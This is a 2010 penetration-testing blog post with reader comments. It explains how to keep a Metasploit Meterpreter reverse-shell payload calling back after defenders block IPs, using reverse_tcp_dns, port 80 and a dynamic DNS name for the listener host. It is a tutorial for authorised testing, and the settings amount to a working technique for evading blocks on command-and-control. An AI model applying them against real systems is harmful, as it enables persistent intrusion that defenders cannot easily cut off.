
Pen-testing RBL Pwnage (metasploit)

scenario

Penetrate the organization during a specific time window, while a security team that has been duly informed of your attacks is watching like a hawk and has an overwhelming desire to block IPs (false sense of security).  So as your exploits succeed and your payloads are delivered, the security team is drooling over the IDS and blocking your reverse TCP IP and port faster than stink on… well, something very stinky.

assumptions

payload

windows/meterpreter/reverse_tcp_dns – This is important, as we want the LHOST name to be resolved when the payload executes, not when it is generated (compile time)

exploit

multi/handler
windows/meterpreter/reverse_tcp


solution

obfuscation

The good old, and not usually very useful, ‘security by obscurity’… or in this case insecurity.  By not using 4444 or 5555 we could maybe cause the in-house team to second-guess whether or not to block an IP.

set LPORT 80

Simple.  But not the most effective.  Even if it delays their blocking the IP, it will still get blocked, and you’ll be back at the drawing board (regenerating the payload with msfpayload); and if this repeats… you’ll have wasted your time, your client’s time, and ultimately the entire test.

better obfuscation

Who cares if they block the IP; let DNS be your shield. Coupled with port 80 this makes for a nice little solution.

set LPORT 80

set LHOST pwnsauced.webhop.net (using DynDNS, but any DNS solution that you can manage will suffice)

Simple.  Effective. The nice thing is that you don’t even have to wait for the in-house team to block the IP; depending on the record’s TTL and your distance from the compromised machine, you could even change the IP yourself. So let them block IPs; you just change up your DNS and keep on pwning.

Categories: Security
Posted on: 10th July 2010 by: Edward Prevost

38 responses to "Pen-testing RBL Pwnage (metasploit)"

  • Comment posted on 12th July 2010 at 22:32 Stephen

    Last time I tried changing the LHOST to a DNS name, it resolved the DNS name to an IP address on compile, and stuck with that, so when you changed your IP address, it wouldn’t work any more. Have you actually tried this and got it to work, or is this just a theory?

  • Comment posted on 12th July 2010 at 23:00 Edward Prevost

    Yep it works… the trick is in using the reverse_tcp_dns. Make sure you’re using that.

  • Comment posted on 24th July 2010 at 22:40 dobrik13

    It was very interesting to read.
    I want to quote your post in my blog. Can I?
    And do you have an account on Twitter?

  • Comment posted on 24th July 2010 at 22:51 Edward Prevost

    Yeah, feel free to use the post however you see fit. I haven’t really ever used Twitter, but I intend to at some point… :)
    http://twitter.com/rezeusor
